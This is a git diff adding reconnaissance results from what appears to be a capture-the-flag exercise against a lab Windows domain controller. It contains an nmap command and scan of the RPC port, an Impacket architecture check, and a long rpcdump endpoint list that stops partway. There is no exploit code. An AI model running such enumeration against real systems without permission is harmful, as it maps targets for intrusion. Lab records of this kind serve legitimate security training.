1767.23 seconds diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/tcp_135_rpc_architecture.txt b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/tcp_135_rpc_architecture.txt new file mode 100644 index 00000000..1b90fd81 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/tcp_135_rpc_architecture.txt @@ -0,0 +1,6 @@ +Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation + +[*] Gathering OS architecture for 1 machines +[*] Socket connect timeout set to 2 secs +10.129.243.131 is 64-bit + diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/tcp_135_rpc_nmap.txt b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/tcp_135_rpc_nmap.txt new file mode 100644 index 00000000..50dbfb88 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/tcp_135_rpc_nmap.txt @@ -0,0 +1,12 @@ +# Nmap 7.93 scan initiated Sat Oct 28 14:27:53 2023 as: nmap -vv --reason -Pn -T4 -sV -p 135 --script=banner,msrpc-enum,rpc-grind,rpcinfo -oN /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/tcp_135_rpc_nmap.txt -oX /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/xml/tcp_135_rpc_nmap.xml 10.129.243.131 +Nmap scan report for megacorp.htb (10.129.243.131) +Host is up, received user-set (0.62s latency). +Scanned at 2023-10-28 14:27:56 CEST for 23s + +PORT STATE SERVICE REASON VERSION +135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC +Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows + +Read data files from: /usr/bin/../share/nmap +Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . +# Nmap done at Sat Oct 28 14:28:19 2023 -- 1 IP address (1 host up) scanned in 26.49 seconds diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/tcp_135_rpc_rpcdump.txt b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/tcp_135_rpc_rpcdump.txt new file mode 100644 index 00000000..51fd1598 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/tcp_135_rpc_rpcdump.txt @@ -0,0 +1,880 @@ +Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation + +[*] Retrieving endpoint list from 10.129.243.131 +Protocol: [MS-RSP]: Remote Shutdown Protocol +Provider: wininit.exe +UUID : D95AFE70-A6D5-4259-822E-2C84DA1DDB0D v1.0 +Bindings: + ncacn_ip_tcp:10.129.243.131[49664] + ncalrpc:[WindowsShutdown] + ncacn_np:\\DC[\PIPE\InitShutdown] + ncalrpc:[WMsgKRpc089280] + +Protocol: N/A +Provider: winlogon.exe +UUID : 76F226C3-EC14-4325-8A99-6A46348418AF v1.0 +Bindings: + ncalrpc:[WindowsShutdown] + ncacn_np:\\DC[\PIPE\InitShutdown] + ncalrpc:[WMsgKRpc089280] + ncalrpc:[WMsgKRpc08A621] + +Protocol: N/A +Provider: N/A +UUID : D09BDEB5-6171-4A34-BFE2-06FA82652568 v1.0 +Bindings: + ncalrpc:[csebpub] + ncalrpc:[LRPC-6b54d635557b62ca53] + ncalrpc:[LRPC-e71821bbfb97e6ac17] + ncalrpc:[LRPC-6b4af19739a6d01556] + ncalrpc:[LRPC-baa5dfd3c285fa9f38] + ncalrpc:[LRPC-56be5249e855b3e1a2] + ncalrpc:[OLE389FDE0EE0F1B1F4D79C4FE9A2C8] + ncalrpc:[LRPC-b02c899b61b7b8f1c9] + ncalrpc:[actkernel] + ncalrpc:[umpo] + ncalrpc:[LRPC-e71821bbfb97e6ac17] + ncalrpc:[LRPC-6b4af19739a6d01556] + ncalrpc:[LRPC-baa5dfd3c285fa9f38] + ncalrpc:[LRPC-56be5249e855b3e1a2] + ncalrpc:[OLE389FDE0EE0F1B1F4D79C4FE9A2C8] + ncalrpc:[LRPC-b02c899b61b7b8f1c9] + ncalrpc:[actkernel] + ncalrpc:[umpo] + ncalrpc:[LRPC-6b4af19739a6d01556] + ncalrpc:[LRPC-baa5dfd3c285fa9f38] + ncalrpc:[LRPC-56be5249e855b3e1a2] + ncalrpc:[OLE389FDE0EE0F1B1F4D79C4FE9A2C8] + ncalrpc:[LRPC-b02c899b61b7b8f1c9] + ncalrpc:[actkernel] + ncalrpc:[umpo] + ncalrpc:[LRPC-9e83194e1e5674c55f] + ncalrpc:[LRPC-a91e72435259adddfa] + +Protocol: N/A +Provider: N/A +UUID : 697DCDA9-3BA9-4EB2-9247-E11F1901B0D2 v1.0 +Bindings: + ncalrpc:[LRPC-6b54d635557b62ca53] + ncalrpc:[LRPC-e71821bbfb97e6ac17] + ncalrpc:[LRPC-6b4af19739a6d01556] + ncalrpc:[LRPC-baa5dfd3c285fa9f38] + ncalrpc:[LRPC-56be5249e855b3e1a2] + ncalrpc:[OLE389FDE0EE0F1B1F4D79C4FE9A2C8] + ncalrpc:[LRPC-b02c899b61b7b8f1c9] + ncalrpc:[actkernel] + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 9B008953-F195-4BF9-BDE0-4471971E58ED v1.0 +Bindings: + ncalrpc:[LRPC-e71821bbfb97e6ac17] + ncalrpc:[LRPC-6b4af19739a6d01556] + ncalrpc:[LRPC-baa5dfd3c285fa9f38] + ncalrpc:[LRPC-56be5249e855b3e1a2] + ncalrpc:[OLE389FDE0EE0F1B1F4D79C4FE9A2C8] + ncalrpc:[LRPC-b02c899b61b7b8f1c9] + ncalrpc:[actkernel] + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : DD59071B-3215-4C59-8481-972EDADC0F6A v1.0 +Bindings: + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 0D47017B-B33B-46AD-9E18-FE96456C5078 v1.0 +Bindings: + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 95406F0B-B239-4318-91BB-CEA3A46FF0DC v1.0 +Bindings: + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 4ED8ABCC-F1E2-438B-981F-BB0E8ABC010C v1.0 +Bindings: + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 0FF1F646-13BB-400A-AB50-9A78F2B7A85A v1.0 +Bindings: + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 6982A06E-5FE2-46B1-B39C-A2C545BFA069 v1.0 +Bindings: + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 082A3471-31B6-422A-B931-A54401960C62 v1.0 +Bindings: + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : FAE436B0-B864-4A87-9EDA-298547CD82F2 v1.0 +Bindings: + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : E53D94CA-7464-4839-B044-09A2FB8B3AE5 v1.0 +Bindings: + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 178D84BE-9291-4994-82C6-3F909ACA5A03 v1.0 +Bindings: + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 4DACE966-A243-4450-AE3F-9B7BCB5315B8 v2.0 +Bindings: + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 1832BCF6-CAB8-41D4-85D2-C9410764F75A v1.0 +Bindings: + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : C521FACF-09A9-42C5-B155-72388595CBF0 v0.0 +Bindings: + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 2C7FD9CE-E706-4B40-B412-953107EF9BB0 v0.0 +Bindings: + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 88ABCBC3-34EA-76AE-8215-767520655A23 v0.0 +Bindings: + ncalrpc:[LRPC-baa5dfd3c285fa9f38] + ncalrpc:[LRPC-56be5249e855b3e1a2] + ncalrpc:[OLE389FDE0EE0F1B1F4D79C4FE9A2C8] + ncalrpc:[LRPC-b02c899b61b7b8f1c9] + ncalrpc:[actkernel] + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 76C217BC-C8B4-4201-A745-373AD9032B1A v1.0 +Bindings: + ncalrpc:[LRPC-baa5dfd3c285fa9f38] + ncalrpc:[LRPC-56be5249e855b3e1a2] + ncalrpc:[OLE389FDE0EE0F1B1F4D79C4FE9A2C8] + ncalrpc:[LRPC-b02c899b61b7b8f1c9] + ncalrpc:[actkernel] + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 55E6B932-1979-45D6-90C5-7F6270724112 v1.0 +Bindings: + ncalrpc:[LRPC-baa5dfd3c285fa9f38] + ncalrpc:[LRPC-56be5249e855b3e1a2] + ncalrpc:[OLE389FDE0EE0F1B1F4D79C4FE9A2C8] + ncalrpc:[LRPC-b02c899b61b7b8f1c9] + ncalrpc:[actkernel] + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 857FB1BE-084F-4FB5-B59C-4B2C4BE5F0CF v1.0 +Bindings: + ncalrpc:[LRPC-56be5249e855b3e1a2] + ncalrpc:[OLE389FDE0EE0F1B1F4D79C4FE9A2C8] + ncalrpc:[LRPC-b02c899b61b7b8f1c9] + ncalrpc:[actkernel] + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : B8CADBAF-E84B-46B9-84F2-6F71C03F9E55 v1.0 +Bindings: + ncalrpc:[LRPC-56be5249e855b3e1a2] + ncalrpc:[OLE389FDE0EE0F1B1F4D79C4FE9A2C8] + ncalrpc:[LRPC-b02c899b61b7b8f1c9] + ncalrpc:[actkernel] + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 20C40295-8DBA-48E6-AEBF-3E78EF3BB144 v1.0 +Bindings: + ncalrpc:[LRPC-56be5249e855b3e1a2] + ncalrpc:[OLE389FDE0EE0F1B1F4D79C4FE9A2C8] + ncalrpc:[LRPC-b02c899b61b7b8f1c9] + ncalrpc:[actkernel] + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 2513BCBE-6CD4-4348-855E-7EFB3C336DD3 v1.0 +Bindings: + ncalrpc:[LRPC-56be5249e855b3e1a2] + ncalrpc:[OLE389FDE0EE0F1B1F4D79C4FE9A2C8] + ncalrpc:[LRPC-b02c899b61b7b8f1c9] + ncalrpc:[actkernel] + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 0D3E2735-CEA0-4ECC-A9E2-41A2D81AED4E v1.0 +Bindings: + ncalrpc:[LRPC-b02c899b61b7b8f1c9] + ncalrpc:[actkernel] + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : C605F9FB-F0A3-4E2A-A073-73560F8D9E3E v1.0 +Bindings: + ncalrpc:[LRPC-b02c899b61b7b8f1c9] + ncalrpc:[actkernel] + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 1B37CA91-76B1-4F5E-A3C7-2ABFC61F2BB0 v1.0 +Bindings: + ncalrpc:[LRPC-b02c899b61b7b8f1c9] + ncalrpc:[actkernel] + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 8BFC3BE1-6DEF-4E2D-AF74-7C47CD0ADE4A v1.0 +Bindings: + ncalrpc:[LRPC-b02c899b61b7b8f1c9] + ncalrpc:[actkernel] + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 2D98A740-581D-41B9-AA0D-A88B9D5CE938 v1.0 +Bindings: + ncalrpc:[LRPC-b02c899b61b7b8f1c9] + ncalrpc:[actkernel] + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 0361AE94-0316-4C6C-8AD8-C594375800E2 v1.0 +Bindings: + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 5824833B-3C1A-4AD2-BDFD-C31D19E23ED2 v1.0 +Bindings: + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : BDAA0970-413B-4A3E-9E5D-F6DC9D7E0760 v1.0 +Bindings: + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 3B338D89-6CFA-44B8-847E-531531BC9992 v1.0 +Bindings: + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 8782D3B9-EBBD-4644-A3D8-E8725381919B v1.0 +Bindings: + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 085B0334-E454-4D91-9B8C-4134F9E793F3 v1.0 +Bindings: + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 4BEC6BB8-B5C2-4B6F-B2C1-5DA5CF92D0D9 v1.0 +Bindings: + ncalrpc:[umpo] + +Protocol: N/A +Provider: sysntfy.dll +UUID : C9AC6DB5-82B7-4E55-AE8A-E464ED7B4277 v1.0 Impl friendly name +Bindings: + ncalrpc:[LRPC-78c65697da0c3cb9e7] + ncalrpc:[LRPC-5d1d91fbc9832f3673] + ncalrpc:[IUserProfile2] + ncalrpc:[LRPC-7f9f9d7e564fa27a15] + ncalrpc:[senssvc] + ncalrpc:[OLE30FBECD9DCFCCBF8301B42E8A091] + ncacn_ip_tcp:10.129.243.131[49667] + ncalrpc:[samss lpc] + ncalrpc:[SidKey Local End Point] + ncalrpc:[protected_storage] + ncalrpc:[lsasspirpc] + ncalrpc:[lsapolicylookup] + ncalrpc:[LSA_EAS_ENDPOINT] + ncalrpc:[lsacap] + ncalrpc:[LSARPC_ENDPOINT] + ncalrpc:[securityevent] + ncalrpc:[audit] + ncacn_np:\\DC[\pipe\lsass] + ncalrpc:[LRPC-2d7a6fcd1e6a5d90b0] + ncalrpc:[OLE59700168EED37EDF88950A0917DC] + +Protocol: N/A +Provider: nsisvc.dll +UUID : 7EA70BCF-48AF-4F6A-8968-6A440754D5FA v1.0 NSI server endpoint +Bindings: + ncalrpc:[LRPC-9ec11ee764d799175d] + +Protocol: N/A +Provider: nrpsrv.dll +UUID : 30ADC50C-5CBC-46CE-9A0E-91914789E23C v1.0 NRP server endpoint +Bindings: + ncalrpc:[LRPC-99bbae991f0f6e961a] + +Protocol: N/A +Provider: N/A +UUID : E40F7B57-7A25-4CD3-A135-7F7D3DF9D16B v1.0 Network Connection Broker server endpoint +Bindings: + ncalrpc:[LRPC-95313533ddc887d499] + ncalrpc:[OLE11E1ADACE4D3F3328245D6CF61B4] + ncalrpc:[LRPC-4f7c4b35ddfa33800c] + ncalrpc:[LRPC-9e83194e1e5674c55f] + +Protocol: N/A +Provider: N/A +UUID : 880FD55E-43B9-11E0-B1A8-CF4EDFD72085 v1.0 KAPI Service endpoint +Bindings: + ncalrpc:[LRPC-95313533ddc887d499] + ncalrpc:[OLE11E1ADACE4D3F3328245D6CF61B4] + ncalrpc:[LRPC-4f7c4b35ddfa33800c] + ncalrpc:[LRPC-9e83194e1e5674c55f] + +Protocol: N/A +Provider: N/A +UUID : 5222821F-D5E2-4885-84F1-5F6185A0EC41 v1.0 Network Connection Broker server endpoint for NCB Reset module +Bindings: + ncalrpc:[LRPC-4f7c4b35ddfa33800c] + ncalrpc:[LRPC-9e83194e1e5674c55f] + +Protocol: N/A +Provider: N/A +UUID : A500D4C6-0DD1-4543-BC0C-D5F93486EAF8 v1.0 +Bindings: + ncalrpc:[LRPC-7d4055d4f64c73ef42] + ncalrpc:[LRPC-a91e72435259adddfa] + +Protocol: N/A +Provider: dhcpcsvc.dll +UUID : 3C4728C5-F0AB-448B-BDA1-6CE01EB0A6D5 v1.0 DHCP Client LRPC Endpoint +Bindings: + ncalrpc:[dhcpcsvc] + ncalrpc:[dhcpcsvc6] + +Protocol: N/A +Provider: dhcpcsvc6.dll +UUID : 3C4728C5-F0AB-448B-BDA1-6CE01EB0A6D6 v1.0 DHCPv6 Client LRPC Endpoint +Bindings: + ncalrpc:[dhcpcsvc6] + +Protocol: [MS-EVEN6]: EventLog Remoting Protocol +Provider: wevtsvc.dll +UUID : F6BEAFF7-1E19-4FBB-9F8F-B89E2018337C v1.0 Event log TCPIP +Bindings: + ncacn_ip_tcp:10.129.243.131[49665] + ncacn_np:\\DC[\pipe\eventlog] + ncalrpc:[eventlog] + +Protocol: N/A +Provider: gpsvc.dll +UUID : 2EB08E3E-639F-4FBA-97B1-14F878961076 v1.0 Group Policy RPC Interface +Bindings: + ncalrpc:[LRPC-1e815b36ff28d761c1] + +Protocol: N/A +Provider: N/A +UUID : 3A9EF155-691D-4449-8D05-09AD57031823 v1.0 +Bindings: + ncacn_ip_tcp:10.129.243.131[49666] + ncalrpc:[LRPC-3e1dbf52587c9cea33] + ncalrpc:[ubpmtaskhostchannel] + ncacn_np:\\DC[\PIPE\atsvc] + ncalrpc:[LRPC-a6fa6dc5bb5e22a3a2] + +Protocol: [MS-TSCH]: Task Scheduler Service Remoting Protocol +Provider: schedsvc.dll +UUID : 86D35949-83C9-4044-B424-DB363231FD0C v1.0 +Bindings: + ncacn_ip_tcp:10.129.243.131[49666] + ncalrpc:[LRPC-3e1dbf52587c9cea33] + ncalrpc:[ubpmtaskhostchannel] + ncacn_np:\\DC[\PIPE\atsvc] + ncalrpc:[LRPC-a6fa6dc5bb5e22a3a2] + +Protocol: N/A +Provider: N/A +UUID : 33D84484-3626-47EE-8C6F-E7E98B113BE1 v2.0 +Bindings: + ncalrpc:[LRPC-3e1dbf52587c9cea33] + ncalrpc:[ubpmtaskhostchannel] + ncacn_np:\\DC[\PIPE\atsvc] + ncalrpc:[LRPC-a6fa6dc5bb5e22a3a2] + +Protocol: [MS-TSCH]: Task Scheduler Service Remoting Protocol +Provider: taskcomp.dll +UUID : 378E52B0-C0A9-11CF-822D-00AA0051E40F v1.0 +Bindings: + ncacn_np:\\DC[\PIPE\atsvc] + ncalrpc:[LRPC-a6fa6dc5bb5e22a3a2] + +Protocol: [MS-TSCH]: Task Scheduler Service Remoting Protocol +Provider: taskcomp.dll +UUID : 1FF70682-0A51-30E8-076D-740BE8CEE98B v1.0 +Bindings: + ncacn_np:\\DC[\PIPE\atsvc] + ncalrpc:[LRPC-a6fa6dc5bb5e22a3a2] + +Protocol: N/A +Provider: schedsvc.dll +UUID : 0A74EF1C-41A4-4E06-83AE-DC74FB1CDD53 v1.0 +Bindings: + ncalrpc:[LRPC-a6fa6dc5bb5e22a3a2] + +Protocol: N/A +Provider: MPSSVC.dll +UUID : 2FB92682-6599-42DC-AE13-BD2CA89BD11C v1.0 Fw APIs +Bindings: + ncalrpc:[LRPC-a3db541015ee3b4092] + ncalrpc:[LRPC-25295713f276d13d17] + ncalrpc:[LRPC-61500542b0c0f189c2] + ncalrpc:[LRPC-3a5ad18195f7896668] + +Protocol: N/A +Provider: N/A +UUID : F47433C3-3E9D-4157-AAD4-83AA1F5C2D4C v1.0 Fw APIs +Bindings: + ncalrpc:[LRPC-25295713f276d13d17] + ncalrpc:[LRPC-61500542b0c0f189c2] + ncalrpc:[LRPC-3a5ad18195f7896668] + +Protocol: N/A +Provider: MPSSVC.dll +UUID : 7F9D11BF-7FB9-436B-A812-B2D50C5D4C03 v1.0 Fw APIs +Bindings: + ncalrpc:[LRPC-61500542b0c0f189c2] + ncalrpc:[LRPC-3a5ad18195f7896668] + +Protocol: N/A +Provider: BFE.DLL +UUID : DD490425-5325-4565-B774-7E27D6C09C24 v1.0 Base Firewall Engine API +Bindings: + ncalrpc:[LRPC-3a5ad18195f7896668] + +Protocol: N/A +Provider: N/A +UUID : 7F1343FE-50A9-4927-A778-0C5859517BAC v1.0 DfsDs service +Bindings: + ncacn_np:\\DC[\PIPE\wkssvc] + ncalrpc:[LRPC-0a9c64a79e96914cf8] + +Protocol: N/A +Provider: N/A +UUID : EB081A0D-10EE-478A-A1DD-50995283E7A8 v3.0 Witness Client Test Interface +Bindings: + ncalrpc:[LRPC-0a9c64a79e96914cf8] + +Protocol: N/A +Provider: N/A +UUID : F2C9B409-C1C9-4100-8639-D8AB1486694A v1.0 Witness Client Upcall Server +Bindings: + ncalrpc:[LRPC-0a9c64a79e96914cf8] + +Protocol: N/A +Provider: N/A +UUID : C2D1B5DD-FA81-4460-9DD6-E7658B85454B v1.0 +Bindings: + ncalrpc:[LRPC-eeed9c661ca2875f9a] + ncalrpc:[OLEAC93DB631A747BCA540781AA6BEF] + +Protocol: N/A +Provider: N/A +UUID : F44E62AF-DAB1-44C2-8013-049A9DE417D6 v1.0 +Bindings: + ncalrpc:[LRPC-eeed9c661ca2875f9a] + ncalrpc:[OLEAC93DB631A747BCA540781AA6BEF] + +Protocol: N/A +Provider: N/A +UUID : 7AEB6705-3AE6-471A-882D-F39C109EDC12 v1.0 +Bindings: + ncalrpc:[LRPC-eeed9c661ca2875f9a] + ncalrpc:[OLEAC93DB631A747BCA540781AA6BEF] + +Protocol: N/A +Provider: N/A +UUID : E7F76134-9EF5-4949-A2D6-3368CC0988F3 v1.0 +Bindings: + ncalrpc:[LRPC-eeed9c661ca2875f9a] + ncalrpc:[OLEAC93DB631A747BCA540781AA6BEF] + +Protocol: N/A +Provider: N/A +UUID : B37F900A-EAE4-4304-A2AB-12BB668C0188 v1.0 +Bindings: + ncalrpc:[LRPC-eeed9c661ca2875f9a] + ncalrpc:[OLEAC93DB631A747BCA540781AA6BEF] + +Protocol: N/A +Provider: N/A +UUID : ABFB6CA3-0C5E-4734-9285-0AEE72FE8D1C v1.0 +Bindings: + ncalrpc:[LRPC-eeed9c661ca2875f9a] + ncalrpc:[OLEAC93DB631A747BCA540781AA6BEF] + +Protocol: N/A +Provider: N/A +UUID : C49A5A70-8A7F-4E70-BA16-1E8F1F193EF1 v1.0 Adh APIs +Bindings: + ncalrpc:[OLE5FCB0823110EF79154A84BC1C955] + ncalrpc:[TeredoControl] + ncalrpc:[TeredoDiagnostics] + ncalrpc:[LRPC-2b9dd75a050dd32327] + +Protocol: N/A +Provider: N/A +UUID : C36BE077-E14B-4FE9-8ABC-E856EF4F048B v1.0 Proxy Manager client server endpoint +Bindings: + ncalrpc:[TeredoControl] + ncalrpc:[TeredoDiagnostics] + ncalrpc:[LRPC-2b9dd75a050dd32327] + +Protocol: N/A +Provider: N/A +UUID : 2E6035B2-E8F1-41A7-A044-656B439C4C34 v1.0 Proxy Manager provider server endpoint +Bindings: + ncalrpc:[TeredoControl] + ncalrpc:[TeredoDiagnostics] + ncalrpc:[LRPC-2b9dd75a050dd32327] + +Protocol: N/A +Provider: iphlpsvc.dll +UUID : 552D076A-CB29-4E44-8B6A-D15E59E2C0AF v1.0 IP Transition Configuration endpoint +Bindings: + ncalrpc:[LRPC-2b9dd75a050dd32327] + +Protocol: N/A +Provider: N/A +UUID : 0D3C7F20-1C8D-4654-A1B3-51563B298BDA v1.0 UserMgrCli +Bindings: + ncalrpc:[LRPC-0f23b80e8c8e8083c8] + ncalrpc:[OLE6A1CCA02AC4BF8BCCEB70B5744EE] + +Protocol: N/A +Provider: N/A +UUID : B18FBAB6-56F8-4702-84E0-41053293A869 v1.0 UserMgrCli +Bindings: + ncalrpc:[LRPC-0f23b80e8c8e8083c8] + ncalrpc:[OLE6A1CCA02AC4BF8BCCEB70B5744EE] + +Protocol: N/A +Provider: N/A +UUID : 51A227AE-825B-41F2-B4A9-1AC9557A1018 v1.0 Ngc Pop Key Service +Bindings: + ncalrpc:[NETLOGON_LRPC] + ncacn_np:\\DC[\pipe\f646315b4c642943] + ncacn_http:10.129.243.131[49674] + ncacn_ip_tcp:10.129.243.131[49673] + ncalrpc:[NTDS_LPC] + ncalrpc:[OLE30FBECD9DCFCCBF8301B42E8A091] + ncacn_ip_tcp:10.129.243.131[49667] + ncalrpc:[samss lpc] + ncalrpc:[SidKey Local End Point] + ncalrpc:[protected_storage] + ncalrpc:[lsasspirpc] + ncalrpc:[lsapolicylookup] + ncalrpc:[LSA_EAS_ENDPOINT] + ncalrpc:[lsacap] + ncalrpc:[LSARPC_ENDPOINT] + ncalrpc:[securityevent] + ncalrpc:[audit] + ncacn_np:\\DC[\pipe\lsass] + +Protocol: N/A +Provider: N/A +UUID : 8FB74744-B2FF-4C00-BE0D-9EF9A191FE1B v1.0 Ngc Pop Key Service +Bindings: + ncalrpc:[NETLOGON_LRPC] + ncacn_np:\\DC[\pipe\f646315b4c642943] + ncacn_http:10.129.243.131[49674] + ncacn_ip_tcp:10.129.243.131[49673] + ncalrpc:[NTDS_LPC] + ncalrpc:[OLE30FBECD9DCFCCBF8301B42E8A091] + ncacn_ip_tcp:10.129.243.131[49667] + ncalrpc:[samss lpc] + ncalrpc:[SidKey Local End Point] + ncalrpc:[protected_storage] + ncalrpc:[lsasspirpc] + ncalrpc:[lsapolicylookup] + ncalrpc:[LSA_EAS_ENDPOINT] + ncalrpc:[lsacap] + ncalrpc:[LSARPC_ENDPOINT] + ncalrpc:[securityevent] + ncalrpc:[audit] + ncacn_np:\\DC[\pipe\lsass] + +Protocol: N/A +Provider: N/A +UUID : B25A52BF-E5DD-4F4A-AEA6-8CA7272A0E86 v2.0 KeyIso +Bindings: + ncalrpc:[NETLOGON_LRPC] + ncacn_np:\\DC[\pipe\f646315b4c642943] + ncacn_http:10.129.243.131[49674] + ncacn_ip_tcp:10.129.243.131[49673] + ncalrpc:[NTDS_LPC] + ncalrpc:[OLE30FBECD9DCFCCBF8301B42E8A091] + ncacn_ip_tcp:10.129.243.131[49667] + ncalrpc:[samss lpc] + ncalrpc:[SidKey Local End Point] + ncalrpc:[protected_storage] + ncalrpc:[lsasspirpc] + ncalrpc:[lsapolicylookup] + ncalrpc:[LSA_EAS_ENDPOINT] + ncalrpc:[lsacap] + ncalrpc:[LSARPC_ENDPOINT] + ncalrpc:[securityevent] + ncalrpc:[audit] + ncacn_np:\\DC[\pipe\lsass] + +Protocol: [MS-NRPC]: Netlogon Remote Protocol +Provider: netlogon.dll +UUID : 12345678-1234-ABCD-EF00-01234567CFFB v1.0 +Bindings: + ncalrpc:[NETLOGON_LRPC] + ncacn_np:\\DC[\pipe\f646315b4c642943] + ncacn_http:10.129.243.131[49674] + ncacn_ip_tcp:10.129.243.131[49673] + ncalrpc:[NTDS_LPC] + ncalrpc:[OLE30FBECD9DCFCCBF8301B42E8A091] + ncacn_ip_tcp:10.129.243.131[49667] + ncalrpc:[samss lpc] + ncalrpc:[SidKey Local End Point] + ncalrpc:[protected_storage] + ncalrpc:[lsasspirpc] + ncalrpc:[lsapolicylookup] + ncalrpc:[LSA_EAS_ENDPOINT] + ncalrpc:[lsacap] + ncalrpc:[LSARPC_ENDPOINT] + ncalrpc:[securityevent] + ncalrpc:[audit] + ncacn_np:\\DC[\pipe\lsass] + +Protocol: [MS-RAA]: Remote Authorization API Protocol +Provider: N/A +UUID : 0B1C2170-5732-4E0E-8CD3-D9B16F3B84D7 v0.0 RemoteAccessCheck +Bindings: + ncalrpc:[NETLOGON_LRPC] + ncacn_np:\\DC[\pipe\f646315b4c642943] + ncacn_http:10.129.243.131[49674] + ncacn_ip_tcp:10.129.243.131[49673] + ncalrpc:[NTDS_LPC] + ncalrpc:[OLE30FBECD9DCFCCBF8301B42E8A091] + ncacn_ip_tcp:10.129.243.131[49667] + ncalrpc:[samss lpc] + ncalrpc:[SidKey Local End Point] + ncalrpc:[protected_storage] + ncalrpc:[lsasspirpc] + ncalrpc:[lsapolicylookup] + ncalrpc:[LSA_EAS_ENDPOINT] + ncalrpc:[lsacap] + ncalrpc:[LSARPC_ENDPOINT] + ncalrpc:[securityevent] + ncalrpc:[audit] + ncacn_np:\\DC[\pipe\lsass] + ncalrpc:[NETLOGON_LRPC] + ncacn_np:\\DC[\pipe\f646315b4c642943] + ncacn_http:10.129.243.131[49674] + ncacn_ip_tcp:10.129.243.131[49673] + ncalrpc:[NTDS_LPC] + ncalrpc:[OLE30FBECD9DCFCCBF8301B42E8A091] + ncacn_ip_tcp:10.129.243.131[49667] + ncalrpc:[samss lpc] + ncalrpc:[SidKey Local End Point] + ncalrpc:[protected_storage] + ncalrpc:[lsasspirpc] + ncalrpc:[lsapolicylookup] + ncalrpc:[LSA_EAS_ENDPOINT] + ncalrpc:[lsacap] + ncalrpc:[LSARPC_ENDPOINT] + ncalrpc:[securityevent] + ncalrpc:[audit] + ncacn_np:\\DC[\pipe\lsass] + +Protocol: [MS-LSAT]: Local Security Authority (Translation Methods) Remote +Provider: lsasrv.dll +UUID : 12345778-1234-ABCD-EF00-0123456789AB v0.0 +Bindings: + ncacn_np:\\DC[\pipe\f646315b4c642943] + ncacn_http:10.129.243.131[49674] + ncacn_ip_tcp:10.129.243.131[49673] + ncalrpc:[NTDS_LPC] + ncalrpc:[OLE30FBECD9DCFCCBF8301B42E8A091] + ncacn_ip_tcp:10.129.243.131[49667] + ncalrpc:[samss lpc] + ncalrpc:[SidKey Local End Point] + ncalrpc:[protected_storage] + ncalrpc:[lsasspirpc] + ncalrpc:[lsapolicylookup] + ncalrpc:[LSA_EAS_ENDPOINT] + ncalrpc:[lsacap] + ncalrpc:[LSARPC_ENDPOINT] + ncalrpc:[securityevent] + ncalrpc:[audit] + ncacn_np:\\DC[\pipe\lsass] + +Protocol: [MS-DRSR]: Directory Replication Service (DRS) Remote Protocol +Provider: ntdsai.dll +UUID : E3514235-4B06-11D1-AB04-00C04FC2DCD2 v4.0 MS NT Directory DRS Interface +Bindings: + ncacn_np:\\DC[\pipe\f646315b4c642943] + ncacn_http:10.129.243.131[49674] + ncacn_ip_tcp:10.129.243.131[49673] + ncalrpc:[NTDS_LPC] + ncalrpc:[OLE30FBECD9DCFCCBF8301B42E8A091] + ncacn_ip_tcp:10.129.243.131[49667] + ncalrpc:[samss lpc] + ncalrpc:[SidKey Local End Point] + ncalrpc:[protected_storage] + 